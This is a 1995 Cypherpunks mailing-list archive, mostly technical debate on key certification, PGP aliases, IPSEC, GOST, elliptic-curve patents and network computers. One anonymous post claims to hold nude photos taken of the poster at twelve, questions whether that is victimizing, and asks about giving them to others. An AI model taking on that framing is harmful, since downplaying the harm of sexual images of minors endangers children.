Date: Wed, 29 Nov 1995 02:52:12 +0800
Subject: The future will be easy to use
In-Reply-To: <v02120d02ace0fcab0df8@[157.22.240.13]>
Message-ID: <199511281801.NAA00386@jekyll.piermont.com>



Jonathan Zamick writes:
> This discussion was based on a group of people getting together to create
> a new easy to use package for handling keys and such. The government is
> going to try to take a dominant stance, and mandate elements of it.

So we can ignore tem. Big deal. They have no laws with which to
enforce their desires.

> However, it is possible, even in an antagonistic relationship, to develop
> positive feedback.

Who cares? An hour spent talking to an idiot from Washington is better
spent writing good code unless there is a law pending in congress, in
which case you are probably better off paying someone who knows what
they are doing to do the talking for you.

> Returning to the original topic though, do we want to get a smaller list
> together to spec out some ideas for the project that was discussed? A
> simple, transparent, tool which would allow people to use strong encryption
> without having to think about it?

You mean, like IPSEC/Photuris? I'll be running IPSEC (but sadly not
Photuris, although I'll be trying to port Aggelos Keromytis' version
at some point) on my laptop at the IETF meeting in Dallas (provided
that I can buy a laptop in time.)

There are three things we are currently missing in the architecture,
IMHO.

1) We need a certificate system to replace X.509 and that plays nicely
   with distributed databases.
2) We need to implement the Eastlake/Kaufman method for embedding
   certificates in the DNS or something similar.
3) We need a good entity naming model.

Given all those being implemented, sometime soon I can see people
telnetting or ftping hither and thither without ever noticing or
caring that their sessions are completely encrypted.

We also have the following need:

4) A good MIME mailer (that looks like NeXT Mail or something like it)
   which has hooks for something MOSSlike that uses the same
   certificate infrastructure described in 1-3 above.
5) SHTTP capable browsers that also use 1-3 listed above.

.pm





From perry at piermont.com  Tue Nov 28 10:52:33 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 29 Nov 1995 02:52:33 +0800
Subject: The future will be easy to use
In-Reply-To: <01HY6EC7T4JI8WYPWJ@mbcl.rutgers.edu>
Message-ID: <199511281802.NAA00401@jekyll.piermont.com>



I apologize. your inclusion style is unusual and confused me.

"E. ALLEN SMITH" writes:
> From:	IN%"perry at piermont.com" 28-NOV-1995 12:49:12.47
> 
> "E. ALLEN SMITH" writes:
> > Phil Karn, Dan Bernstein, and some others (who I'm not sure want to
> > be named) are talking to the government.
> 
> If you call lawsuits "talking", not that talking is important.
> -----------------
> 	Umm... I wasn't the one that wrote that. It was included in the
> message to which I was replying.
> 	-Allen
> 





From cme at TIS.COM  Tue Nov 28 11:00:20 1995
From: cme at TIS.COM (Carl Ellison)
Date: Wed, 29 Nov 1995 03:00:20 +0800
Subject: The future will be easy to use
In-Reply-To: <199511280009.QAA12863@comsec.com>
Message-ID: <9511281803.AA20521@tis.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 27 Nov 1995 11:06:13 -0800 (PST)
>From: Raph Levien <raph at c2.org>


>   Form this perspective, let's take a look at the recent thread on
>"establishing trust." Carl Ellison advocates the MOSS alias system. My
>understanding of this system is that individual users associate "aliases" 
>with public keys. If done right, it can work well. However, from a
>usability perspective, it is just one more trouble spot. 

Yes, it could easily be done wrong in such a way that the user gets
confused rather than helped; burdened rather than relieved.

I advocate aliases because that's how *I* think.  I think in words so I
assign my own names (aliases) for the people who populate my mental model
of the world.  By definition, these are all my correspondents.  It's
possible of course that some other people (of different Myers-Briggs type,
perhaps) think differently -- not in words or aliases.  If that's true, we
should find out how they think and associate the right thing for them.  For
example, I had a friend (a painter/sculpter) who thought in images.  She
might prefer to use little pictures or icons (of her own drawing) as the
aliases.

>   First, on what basis will users decide which keys are worthy of being
>assigned which aliases?  Public keys are big hunks of base64 encoded
>gibberish.  They are difficult to present in a user interface, difficult 
>to communicate in alternate, known secure channels (such as telephone 
>calls and face to face communication).  There is no way that a person 
>could memorize one.

That's true.  What the user would have to see is some icon (or, for
text-bound folks, a temporary unique string) until the user chooses and
assigns the appropriate alias.  That icon would have no meaning by itself.
It would acquire a meaning by being associated with some message or set of
messages:

a) an attribute testimony (signed by someone with known authority to
	specify such an attribute -- the equivalent of a certificate)

b) a set of messages signed by the key in question (tying the key to
	the source material from which the user formed his/her impression
	of the sender)

I, the user, would want to be able to call up the set of defining messages
for any key or alias at any time in the future -- just in case I get so
many aliases that I forget who one belongs to.

>   The other issue is how much time and energy the user has to spend 
>keeping the alias database up to date. There is no way to communicate 
>securely with anyone who's not in the database. If the user is 
>communicating with a large number of people, then it's very tempting to 
>get sloppy.

I keep a fairly large database of aliases already, in my .mailrc on UNIX.
Eudora permits a similar DB.  So do a number of other mailers.  Users must
be demanding this feature and using it.  All I say we have to add to that
is protection from tampering.

>   There's no way around it. This kind of system will not make it in the 
>big time.  

I wouldn't be so quick to dismiss it.

>	    As I see it, any system that does must have the following 
>properties:
>
>   * Some variant on the Web of Trust.

Of course -- you have to have some means for communicating and recording
attributions (that the person who owns a key is allowed to spend money on a
given bank account; that the person who owns a key goes by the name Carl or
receives mail at cme at acm.org; that the person who owns a key is a trusted
developer of PGP; ...).

>   * Online key-servers for getting keys in real time.
>   * A clean mechanism for validating keys through alternate channels.

These two have to go together -- but I'm curious what anyone means by
"validating keys".  I see this as the flaw killing certificate structures
like X.509 or PGP's.  [Even Steve Kent, a major X.509 advocate, seems to
see this problem (with sadness, in his case).]

I had a secretary once, long ago.  I would drive her home from work
occasionally -- or to parties -- when her husband wasn't around or wasn't
interested in going someplace.  One time, in passing, he noted that this
arrangement was OK with him because he "trusted her".  I trusted her, too.
I knew her to be having affairs with various people (not me at the time)
but he didn't.  So we each trusted her but what we trusted her to be was
different.  Just saying that we trusted her wasn't saying anything.

As soon as you qualify the "validated key" (e.g., to be allowed to spend
money, etc.), you get to the signed attributes which I advocate over
certificates.  If all you do with the validated key is tie it to a text
string which purports to specify a human being, as X.509 or PGP do, you
haven't done anything for me.  If all humans had unique names, then this
might mean something to me (assuming I knew the human in question and knew
his unique name).  However, that's what killed X.509 -- the need for unique
names.  We don't have them and we're not about to adopt some new social
structure which assigns them.  Even if we did all adopt unique names, you
postulated a *large* set of people to communicate with -- larger than my
immediate circle of acquaintances, presumably -- so even a unique name
would be meaningless to me because I would not have met the person in
question.  If the unique name certificate works at all it's because I have
some mechanism (not mentioned in the certificate hierarchy design) for
attaching attributes to the named person.  However, if I haven't met the
person in question, I don't have that mechanism already and it needs to be
created alongside the certificate mechanism.

I don't need testimony about the name (unique or otherwise) of the person
who owns that key.  I need testimony about the attributes of that person
(PGP developer; fellow Cypherpunk; FBI agent; undercover NSA plant;
permission to use a checking account; receives mail at xxx at yyy.com; ...).
That testimony can be provided by referencing the key itself, rather than
some (artificially unique) name which exists only to link the attribute to
the key.  The S/W which links these together and lets me find the various
testimonies for a key has to be convenient -- but that was your original
point and I concur.  I object only to the implication that current
certificate hierarchy thinking gets us closer to that goal than the direct
signed attribute statements would.

>   There are three possible outcomes: we build it, the NSA builds it, or 
>Microsoft/Netscape builds it. This last outcome might not be so bad, but 
>only in the first one can we rely on our principles being advanced.

Amen!

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLtON1QXJENzYr45AQGiEwP+OpETJDPJ8rWbur4oH/PCZqKWtXmzTquV
4QIwoZlXoK6RnZ60szR/qqPxjnj+TtsO8FOQK5lWurv+FG67ma5PfyNbxU+WFapY
uxwop8Ivb3bw0uFT2oh2VE5owAYFkmqz7kd7GleEG33dGOUz7jSELugzL4Ag8zRF
40qPwsU7B08=
=aeKx
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLtOvVQXJENzYr45AQH5RQP+JroFSz3bJapOGEqA2pfhZ1dn9d7VDEUd
h/JLbhFkgYbzMGsVzpu20Ww0uOsOwxQR2ItLkaSlTG0O76rgATE2Cma9LEvdoque
LMgN/xg0GmaSHoecHLuKJxRz/1xreKODuai2FvndyjspfgO/H6zrQOfhsWn3qa6a
ZqnNaEY+kXw=
=cuUk
-----END PGP SIGNATURE-----





From adam at lighthouse.homeport.org  Tue Nov 28 11:19:53 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Wed, 29 Nov 1995 03:19:53 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511281032.CAA21495@jobe.shell.portal.com>
Message-ID: <199511281813.NAA12568@homeport.org>


| > Well, signed Alice posts have shown up, so we will just have to assume
| > that the above was a spoof and that the signed Alice posts are the
| > real ones, now won't we?
| 
| Perry.  Normally I try my best to ignore you.
| 
| But I will simply repeat, I have never signed a post, and have no 
| intention of beginning to sign any posts, until I establish a secure 
| machine in a secure complex that is dedicated to that purpose.


	When did PGP claim to be perfect?  Its not; and the point is
not to obtain 100% confidence in someone, but a useable level of
confidence.  If the remailer chains work, then it would be tough to
find out who you are.  If we do find out who you are, your integrity
shell will tell you that your PGP binary was tampered with.  If we
don't know who you are, then your machine is safe from just about
anything other than a thorough sweep of all the net connected users in
Canada.

	So, please explain the threat that causes you to think that
'pretty good' is worthless in this context.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From vwbug at iadfw.net  Tue Nov 28 11:43:27 1995
From: vwbug at iadfw.net (Bill)
Date: Wed, 29 Nov 1995 03:43:27 +0800
Subject: Who has the right to read your e-mail? Old hash, but I need to ask.
Message-ID: <2.2b7.32.19951128125813.00679628@server.iadfw.net>


A recent incident brought this up at work.
If someone could point me to a site that would help explain the in's and out's 
of the laws regarding the following -

Who has the right to read your personal e-mail.
E-mail created at work?
E-mail downdloaded at work?
E-mail stored on a PC at work? 

Thanks 
vwbug at iadfw.net







From klong at phoenix.net  Tue Nov 28 11:44:32 1995
From: klong at phoenix.net (Siberia)
Date: Wed, 29 Nov 1995 03:44:32 +0800
Subject: PGP hooks for Pegasus Mail?
Message-ID: <199511281905.NAA03947@phoenix.net>


It is happening...about a week off from the first beta release.  Announcements 
will be posted to the Pegasus mail support lists and bit.listserv.pmail 
(as well as other appropriate posting spots).

>Anyone done anything regarding PGP hooks into Pegasus Mail?  I'm 
>running it at home now (SLIPped into my Linux box), and I'd like to 
>find a way to integrate PGP into Pegasus Mail.
>
>Thanks in advance for any replies...
> 
> Ed -

Namaste'

Kimberly Long
klong at phoenix.net

Standing on the bare ground...all mean egotism vanishes.  I become a
transparent eyeball; I am nothing; I see all; the currents of the
Universal Being circulate through me; I am part or particle of God.
~Ralph Waldo Emerson  )O( 






From perry at piermont.com  Tue Nov 28 11:45:22 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 29 Nov 1995 03:45:22 +0800
Subject: The future will be easy to use (fwd)
In-Reply-To: <v01530506ace05744708d@[206.86.1.35]>
Message-ID: <199511281329.IAA13468@jekyll.piermont.com>



Steven Weller writes:
> >Realisticaly, who in their right mind would buy a diskless workstation to
> >connect to Internet?
> 
> The same sort of things could be said of the telephone compared with
> written correspondence. Why would anyone have one in their business or
> home? Anyone can overhear a conversation, people will just chat, the only
> thing you can do with it is talk, there is no record of the correspondence,
> why would anyone want to talk to people on the other side of town? etc.

This is different. In an era of distributed processing, they are
returning you to the mainframe model. I don't see that this can work
very well. Considering how much more powerful a $1000 machine is, why
would you want something half that price that can do one hundredth as
much for you?

Perry





From stewarts at ix.netcom.com  Tue Nov 28 11:51:22 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 29 Nov 1995 03:51:22 +0800
Subject: [NOISE, sorta] Re: Inexpensive Crypto Boxes...
Message-ID: <199511281935.LAA06806@ix11.ix.netcom.com>


At 10:04 AM 11/28/95 -0500, Mike Fletcher <fletch at ain.bls.com> wrote:
>	For those who don't know, the PSX is a CD based gaming console
>released (in the US) in Sept by Sony.  It's a MIPS R3000/25MHz processor
>with some SGI-designed polygon chips, 2x CD-ROM, 1M RAM, 2M video RAM.

There are a number of reasonably powerful game machines under $300,
though that uses TV-screen video, which isn't enough for decent text;
doing a $500 machine with a real monitor should be quite possible.
However, to make it functionally useful, it needs at least a connector
for a a disk drive - couch potato web-surfers can skip it, but anybody
who wants to do real work will spend the $100-300 to add a disk,
and probably add a CD-ROM as well.  Without a disk, you can't do
off-line reading, which significantly affects anyone using
pay-by-the-hour network access services.

(I used to use a diskless Sun with 40 MB RAM on an Ethernet, and it
was usually fine, but I was motivated by not wanting a fan on my computer...)

ObCrypto - you _can_ do decent crypto on a diskless machine as long as
you've got some non-volatile storage for keys; a few KB should do,
and the main applications would have to run in ROM.


>	The line between toy and real machine is getting more and 
>more fuzzy (we use a box here at work with the same processor to compile
>for an AT&T telephony switch (which tells you how sad the AT&T product
>is :) :))).  

Telephone switches don't need high-power CPU-crunchers, and the 
R3000 was quite a decent processor.  They need clean, stable CPUs
and appropriately-designed operating systems which are good at
controlling lots of polled I/O devices - it's a PDP-11 job,
rather than a Cray job.  Generally the OSs have been
hand-rolled, though it's becoming much more practical to use
Unix to develop user-interface applications now that processors
are fast enough to have short interrupt times.  The previous 
switches used Intel processors - 386s let you do more than 8086s,
pulling applications into the CPU instead of low-level logic.

>How long until the NSA tries a Chinese Lottery attack hidden
>inside a Nintendo cart?

You've read "The Hacker and the Ants", haven't you?  :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From raph at c2.org  Tue Nov 28 12:03:41 1995
From: raph at c2.org (Raph Levien)
Date: Wed, 29 Nov 1995 04:03:41 +0800
Subject: The future will be easy to use
In-Reply-To: <9511281803.AA20521@tis.com>
Message-ID: <Pine.SUN.3.91.951128113331.17420A@infinity.c2.org>




On Tue, 28 Nov 1995, Carl Ellison wrote:
> Raph Levien wrote:
> >   First, on what basis will users decide which keys are worthy of being
> >assigned which aliases?  Public keys are big hunks of base64 encoded
> >gibberish.  They are difficult to present in a user interface, difficult 
> >to communicate in alternate, known secure channels (such as telephone 
> >calls and face to face communication).  There is no way that a person 
> >could memorize one.
> 
> That's true.  What the user would have to see is some icon (or, for
> text-bound folks, a temporary unique string) until the user chooses and
> assigns the appropriate alias.  That icon would have no meaning by itself.
> It would acquire a meaning by being associated with some message or set of
> messages:
> 
> a) an attribute testimony (signed by someone with known authority to
> 	specify such an attribute -- the equivalent of a certificate)

This is the induction case, not the base case. It assumes that you've 
already got a bunch of trusted public keys in your database. It also 
assumes the willingness of the ownsers of those public keys to sign new 
keys. See, now they've got the same problem of trying to determine 
whether the key is valid. Turtles all the way down.

> b) a set of messages signed by the key in question (tying the key to
> 	the source material from which the user formed his/her impression
> 	of the sender)

There being no reason, of course, why Mallet couldn't just sign all that 
stuff with his own signature. Here, you're relying on the ability of data 
to authenticate itself.

I am simply proposing a third alternative that has neither of these
problems: a short unique name for the key. Its success relies on
alternate, non-digital forms of communication: the phone, ink-signed
paper, face to face, whatever. 

[complex stuff deleted - I only wanted to make a simple point]

Raph






From raph at c2.org  Tue Nov 28 12:07:54 1995
From: raph at c2.org (Raph Levien)
Date: Wed, 29 Nov 1995 04:07:54 +0800
Subject: The future will be easy to use
In-Reply-To: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.951128114347.17420B-100000@infinity.c2.org>




On Tue, 28 Nov 1995, E. ALLEN SMITH wrote:

> 	If you'd like a non-programmer user to test out the user interface, I'm
> available to some degree if it's usable on a VAX (and to a lesser degree for
> MS-DOS). Given the number of people like me who are interacting using a non-GUI
> interface for various reasons (including using a mainframe for email), I would
> suggest not making it specifically GUI-dependant.

Unfortunately, it's _way_ too early to recruit volunteers to test out the 
user interface. But thanks.

Raph






From wlkngowl at unix.asb.com  Wed Nov 29 04:09:06 1995
From: wlkngowl at unix.asb.com (wlkngowl at unix.asb.com)
Date: Wed, 29 Nov 95 04:09:06 PST
Subject: GOST for sale
Message-ID: <199511291310.HAA00198@UNiX.asb.com>


On Mon, 27 Nov 1995 11:53:26 -0800, you wrote:

>At 03:43 AM 11/24/95 +0100, Mats Bergstrom <asgaard at sos.sll.se> wrote:
>>According to a short article in a Swedish newspaper (DN)
>>with the title 'Spy Code of KGB can make computers safe', 
>>JETICO INC., located in Finland (Tammerfors), introduced
>>a new crypto system on the world market last week. It's 
>>based on GOST, the Russian federal standard algorithm.

[..]
>From what I've read of GOST, it's really a family of cyphers with
>different sets of S-boxes - routine military gets one set, top secret
>gets another, civilian govt another, etc.  Aside from possible
>differences in security level for the S-boxes, one motivation is
>that you can't take civilian govt decryptors and use them to read
>or forge top secret military crypto, etc.  If this is correct,
>then some sets of S-boxes probably do have trapdoors (at least
>susceptibility to differential cryptanalysis_; how good are the
>ones that Jetico is selling, what credentials do they have to
>convince us their cryptanalysis is good enough, and why are they
>doing parts of it in hardware?

Based on the few articles I've read, S-Boxes are generated randomly,
or (doubtful in this case) generated from the passphrase, making an
even larger keyspace.

--Rob






From anon-remailer at utopia.hacktic.nl  Tue Nov 28 12:37:04 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Wed, 29 Nov 1995 04:37:04 +0800
Subject: NOISE: kidporn (was Re: crypto for porno users)
Message-ID: <199511282024.VAA29706@utopia.hacktic.nl>


Moroni wrote:

> It is the most victimizing of all crimes and I think of speak for some of
> us when I say that it would be better if we all found a way to get back
> to discussing the problems of cryptography as related to we not
> pornographers.

i have some nude pics i took of myself when i was twelve.
i don't *feel* victimized.  maybe i was victimized but 
didn't know it?

gandalf.

PS.  is it a crime for me to keep these pics?
if the cops find them in my locker, will i get busted?
what happens if i give them to someone? is that a crime? 








From rah at shipwright.com  Tue Nov 28 12:44:03 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 29 Nov 1995 04:44:03 +0800
Subject: e$: Moof! (Hettinga Speaks at Apple)
Message-ID: <v02120d02ace116e8b837@[199.0.65.105]>


God help us all.

I've been invited to the CyberDog Coding Retreat next week at Apple
Computer in Cupertino. Getting flown out there is cool. Hanging with the
more clueful Mac Internet types and getting to kibbitz and watch (I like to
watch!) them code OpenDoc parts for the internet from 8AM to midnight plus,
subsisting on Dew and Pizza is really way cool. Even getting some
mac.cypherpunks in the door to code cypto parts is extremely cool. But...

They've asked me to give a "talk". All by myself. In an auditorium. With an
audience, I mean. With publicity. I feel like Hoffman in Rain Man...
V-E-R-N, Verrrn... More to the point, I feel like I'm tempting fate,
here...

Sooo. I've been told I can have friends in the audience. That's cool. As
many friends as I want. That's even cooler. I can even have reinforcements
up on the rostrum. That's extremely cool.

So, while I work on the "reinforcements up on the rostrum" part, *please*
come and help me explain this stuff to the rest of the Apple community.

I've appended the actual poster copy, with the relevant details, below.
The poster, and its copyright-violating picture of Grommit the Dog are also
found on the web at:

http://thumper.vmeng.com/pub/rah/talk.html

Cheers,
Bob Hettinga


-----------------------


Geodesic Software and Financial Cryptography for Dogs
Robert Hettinga
12 PM, Dec 6th 1995, Town Hall, R&D4


Robert Hettinga (really, nobody you ever
heard of), will talk about the internet as a geodesic network and
information surfactant, about OpenDoc as geodesic software and code
surfactant, about really frightening stuff like strong cryptography on
public networks and the four horsemen of the infoclypse, about digital cash
and bearer certificates, and finally, about why teaching CyberDog how to do
financial cryptography is so important.

See this 350lb guy jump up and down and blather on for at least an hour
about anonymous transactions, about the disappearance of the capital
markets as as we know them, the rise and fall of the pyramid as communication
metaphor, and how to raise Bucky Fuller from the dead.

Learn why you should teach your code to surfact any application "suite" into
little bitty pieces, to send you cash in the mail no matter where you are,
and to make the whole status quo (everywhere!) disappear in a cloud of
self-organized chaos.

Cryptoanarchy. Right here in Cupertino, folks.

See you there...



-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From cme at TIS.COM  Tue Nov 28 13:05:36 1995
From: cme at TIS.COM (Carl Ellison)
Date: Wed, 29 Nov 1995 05:05:36 +0800
Subject: The future will be easy to use
In-Reply-To: <Pine.SUN.3.91.951128113331.17420A@infinity.c2.org>
Message-ID: <9511282030.AA04051@tis.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Tue, 28 Nov 1995 11:43:34 -0800 (PST)
>From: Raph Levien <raph at c2.org>

>> It would acquire a meaning by being associated with some message or set of
>> messages:
>> 
>> a) an attribute testimony (signed by someone with known authority to
>> 	specify such an attribute -- the equivalent of a certificate)
>
>This is the induction case, not the base case. It assumes that you've 
>already got a bunch of trusted public keys in your database. It also 
>assumes the willingness of the ownsers of those public keys to sign new 
>keys. See, now they've got the same problem of trying to determine 
>whether the key is valid. Turtles all the way down.

Of course.  This isn't the base case.  We would have some keys which I sign
based on my own personal knowledge; things handed to me by people I know;
some possibly published in the paper where the real key owner would see the
claim and be able to contest it.  PGP today comes shipped with some keys to
provide the base for a chain of key signatures, but there's no verification
of PRZ's or JIS's keys.  One has to prime the mesh somehow.

I personally prime it by having some keys (or fingerprints) exchanged face
to face with people I know -- and having others acquired by association
with signed messages (b).  I don't have any yet whose trust has been
acquired by attribution (a), since we don't have that machinery set up yet.

BTW -- PGP currently lacks a way for me to note, when I sign a key, how it
is that I trust that key (by personal meeting, by attribution, by message
association, ...).  A signed attribute record would let me record that
information for myself as well as for others.

>> b) a set of messages signed by the key in question (tying the key to
>> 	the source material from which the user formed his/her impression
>> 	of the sender)
>
>There being no reason, of course, why Mallet couldn't just sign all that 
>stuff with his own signature. Here, you're relying on the ability of data 
>to authenticate itself.

Here I'm talking about people I "meet" and "get to know" based strictly on
my own e-mail conversations with them.  For such people, there is no other
evidence.  If it weren't for those messages, these people effectively
wouldn't exist in my world.  These messages define the people in question.

Stated another way:  I want to communicate with Alice.  I don't want to
communicate with Bob.  I've never met Alice but I have an address for her
and a public key.

	Alice --- Bob --- Carl

shows Bob as an active eavesdropper, controlling all of Alice's channels,
blocking release of her real key, announcing a key he controls under her
name to the rest of the world.  By contrast,

	Alice --- Bob --- Carl

shows Bob as Alice's secretary, who has been given the job, by Alice, of
reading all Alice's mail, choosing which to pass along to her and answering
all the others.  Alice has generated a key for herself and has given the
private key to Bob so that he can sign for her and read all her mail.
Alice could even have that key certified as hers within some massive X.509
hierarchy -- doing that before she gave the private key to Bob.

I know of no crypto protocol which will distinguish one from the other
unless I have a private channel to Alice at some time -- but that
contradicts the original assumption that I've never met her.

In both cases, the person I think of as Alice is really

	(Alice --- Bob) ---

and that's the "person" I learn to trust or not to trust.  That's the
"person" for whom I attach an alias to the public key.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLtxOlQXJENzYr45AQFw4gP/es2salfOBrsPW3X1d+NnsBTThKJSkTYP
yCp7YZ9iIgBXnV/rQ3TcZg2Gbts/QwpUrqN7fQQ+tNazMxqomd3+Iz+5HPTU2jc7
5rW8p/dyq1vKGDgy+M4ohTLE9XXVJLJo3AwpUJeAhqd/SAUiJPTpdgggotnXfAeF
wWovhe3nq+U=
=jpzx
-----END PGP SIGNATURE-----





From dan at milliways.org  Wed Nov 29 05:10:29 1995
From: dan at milliways.org (Dan Bailey)
Date: Wed, 29 Nov 95 05:10:29 PST
Subject: Elliptic curves, patent status?
Message-ID: <199511291310.NAA27164@pop01.ny.us.ibm.net>


On Mon, 27 Nov 1995 23:16:10 -0800 jamesd at echeque.com wrote:

>At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
>>
>> I'm unclear about the patent status of elliptic curve 
>> systems. Are they covered by the Diffie-Hellman patent? 
>> That is, is the lnguage of this patent broad enough to 
>> cover _all_ public-key systems, regardless of their 
>> mathematical basis? 
>
>No, but RSA will litigate you with the objective of
>inflicting extravagant legal costs regardless.








From dan at milliways.org  Wed Nov 29 05:11:55 1995
From: dan at milliways.org (Dan Bailey)
Date: Wed, 29 Nov 95 05:11:55 PST
Subject: Elliptic curves, patent status?
Message-ID: <199511291311.NAA21044@pop01.ny.us.ibm.net>


On Mon, 27 Nov 1995 23:16:10 -0800 jamesd at echeque.com wrote:

>At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
>>
>> I'm unclear about the patent status of elliptic curve 
>> systems. Are they covered by the Diffie-Hellman patent? 
>> That is, is the lnguage of this patent broad enough to 
>> cover _all_ public-key systems, regardless of their 
>> mathematical basis? 
>
>No, but RSA will litigate you with the objective of
>inflicting extravagant legal costs regardless.

Does the patent create any headaches for elliptic curve research or
publishing elliptic curve papers, or just for new products?
						Dan






From froomkin at law.miami.edu  Tue Nov 28 13:15:04 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Wed, 29 Nov 1995 05:15:04 +0800
Subject: Draft paper on anonymity, E$ and other stuff
Message-ID: <Pine.SUN.3.91.951128155759.9479T-100000@viper.law.miami.edu>



Now available for download: a draft of my latest paper, Flood Control on
the Information Ocean: Living With Anonymity, Digital Cash, and
Distributed Databases. 

I'd like your comments please, especially if you can send them soon. The
paper is available in a postscript file (966K) or a compressed postscript
file (253 K) by clicking on links from my homepage:

http://www.law.miami.edu/~froomkin/ocean.ps

http://www.law.miami.edu/~froomkin/ocean.ps.Z

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From dlv at bwalk.dm.com  Tue Nov 28 13:20:54 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 29 Nov 1995 05:20:54 +0800
Subject: The future will be easy to use
In-Reply-To: <199511272224.QAA20539@spirit.sctc.com>
Message-ID: <iP99eD2w165w@bwalk.dm.com>


zuhn at sctc.com (david d `zoo' zuhn) writes:
> On the technical side, what piece of software do we need for privacy?

One thing that David didn't mention is security add-ons to the "network
computers" that are supposed to be rolled out within the next few months --
the successors to X terminals, $500 boxes with a good screen/sound,
cheap cpu, and a few megs of ram and flash memory to hold a web browser.
I expect some folks to make a good living by writing add-ons (including
crypto add-ons) to these gizmos.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From rah at shipwright.com  Tue Nov 28 13:36:43 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 29 Nov 1995 05:36:43 +0800
Subject: (fwd) Like FV with Crypto ... 'Cept Different ...
Message-ID: <v02120d00ace12b741277@[199.0.65.105]>



--- begin forwarded text

To: www-buyinfo <www-buyinfo at allegra.att.com>
From: Andrew Barrett/CheckFree Corporation
  <Andrew_Barrett at checkfree.com>
Date: 28 Nov 95  9:32:28 EDT
Subject: Like FV with Crypto ... 'Cept Different ...
Mime-Version: 1.0

 SAN RAFAEL, Calif., Nov. 22 /PRNewswire/  -- SBT's
Internet Division today announced that its electronic storefront package,
WebTrader 2.0, will integrate with Checkfree's credit card processing
service providing a complete, secure Internet commerce solution.  The
combination of SBT's WebTrader and Checkfree's Electronic Payment Processing
service allows any company to sell products on the Internet, automate order
entry and fulfillment and receive credit card payments electronically.

<SNIP SRC="blah, blah,blah">PR balloon deflated</snip>

  The Internet commerce solution process will be initiated by a merchant
contacting an SBT Internet Business Consultant (IBC) who will install and
configure Web Trader and provide the client with the Checkfree Merchant
Application package.  The IBC will arrange for a Checkfree account manager
to be assigned to the account who will assist with the application process.
The IBC will then customize and modify the Web Trader application, and
tailor Checkfree's processing to the merchant's specific needs.  Once the
application has been processed and approved, the IBC will coordinate site
testing for credit card transactions.  At that point the merchant is
equipped to conduct business on the Internet.

  WebTrader is the most widely-installed Windows program that allows
businesses to create an electronic storefront with order forms for products
or services on the Web.  It automatically processes the orders and sends the
customer confirmation via e-mail.  WebTrader initiates and completes the
sales process by providing a direct, instantaneous connection between vendor
and customer, RSA Data Security's encryption software which keeps credit
card numbers and other sensitive data private once it is received by the
vendor's Web server.

  WebTrader includes several HTML templates for home pages and sales order
forms that are ready to run on the Web.  When a customer on the Web
completes a form, the information is sent to the vendor via Internet e-mail.
The vendor employs an integrated e-mail parsing program that automatically
transforms the message into a standard SBT Sales Orders' bid.  After the bid
is authorized, it is converted to a firm order and an e-mail message
confirming receipt of the order is sent via Internet to the customer.
WebTrader also includes the ability to capture and track other critical
business information such as sales leads, product registration and customer
surveys.

  WebTrader can be used as a stand-alone Internet application or in
conjunction with SBT's Pro Series 3.0i accounting software.  WebTrader has a
suggested retail price of $1,295.

->Finger abarrett at ee.net for Keyprint
->Public Key Coming Soon to a Keyserver Near You!

--- end forwarded text


-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From nowhere at bsu-cs.bsu.edu  Tue Nov 28 14:15:57 1995
From: nowhere at bsu-cs.bsu.edu (Anonymous)
Date: Wed, 29 Nov 1995 06:15:57 +0800
Subject: No Subject
Message-ID: <199511282157.QAA10096@bsu-cs.bsu.edu>


Is this list archived so that I can try to look stuff up before asking 
stupid questions?






